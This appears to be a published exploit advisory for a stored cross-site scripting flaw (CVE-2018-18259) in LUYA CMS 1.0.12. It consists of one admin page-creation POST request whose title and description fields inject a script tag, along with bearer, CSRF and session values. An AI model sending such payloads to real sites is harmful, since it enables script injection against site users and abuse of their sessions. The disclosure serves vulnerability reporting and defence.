LUYA CMS 1.0.12 Cross Site Scripting

`# Exploit Title: LUYA CMS 1.0.12 - Cross-Site Scripting  
# Date: 2018-10-11   
# Exploit Author: Ismail Tasdelen  
# Vendor Homepage: https://luya.io/  
# Software Link : https://github.com/luyadev/luya/  
# Software : LUYA CMS  
# Version : 1.0.12  
# Vulernability Type : Cross-site Scripting  
# Vulenrability : Stored XSS  
# CVE : CVE-2018-18259  
  
  
# HTTP POST Request :  
  
POST /admin/api-cms-nav/create-page HTTP/1.1  
Host: demo.luya.io  
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:60.0) Gecko/20100101 Firefox/60.0  
Accept: application/json, text/plain, */*  
Accept-Language: en-US,en;q=0.5  
Accept-Encoding: gzip, deflate  
Referer: https://demo.luya.io/en/admin  
Content-Type: application/x-www-form-urlencoded; charset=UTF-8  
Authorization: Bearer 53431c6c5c751d6655966396667a70cbf483bc2869ce1b45cecb5be8983d6fa08o5E7gSdThq_KprALbv_-r496se-lhLi  
X-CSRF-Token: vHqCboMdLTmKiufTdIrCcdmFAhmahRSLihW4CuJKQprpGNID4nZPd8njkYkO7Igpi-RFKfDgf8LTcOp4mhB34A==  
Content-Length: 295  
Cookie: _pk_id.1.2c3a=0f1464d36bad1760.1539204750.1.1539204750.1539204750.; _pk_ref.1.2c3a=%5B%22%22%2C%22%22%2C1539204750%2C%22https%3A%2F%2Fwww.google.com%2F%22%5D; PHPSESSID=pm9625erik3t3ddkqmql8nb0u1; _csrf_admin=b5e1f46c449881bd2d16dd32fcd2d2e02579c1a19bc7e233396e4bac99665c23a%3A2%3A%7Bi%3A0%3Bs%3A11%3A%22_csrf_admin%22%3Bi%3A1%3Bs%3A32%3A%22DxmjAB6ItiORW07BdnHjOXGhutdrmcx_%22%3B%7D  
Connection: close  
  
isInline=false&nav_item_type=1&parent_nav_id=0&is_draft=0&nav_container_id=1&lang_id=1&use_draft=0&layout_id=2&from_draft_id=0&title=%22%3E%3Cscript%3Ealert(%22Ismail%20Tasdelen%22)%3C%2Fscript%3E&alias=url-address-test&description=%22%3E%3Cscript%3Ealert(%22Ismail%20Tasdelen%22)%3C%2Fscript%3E  
`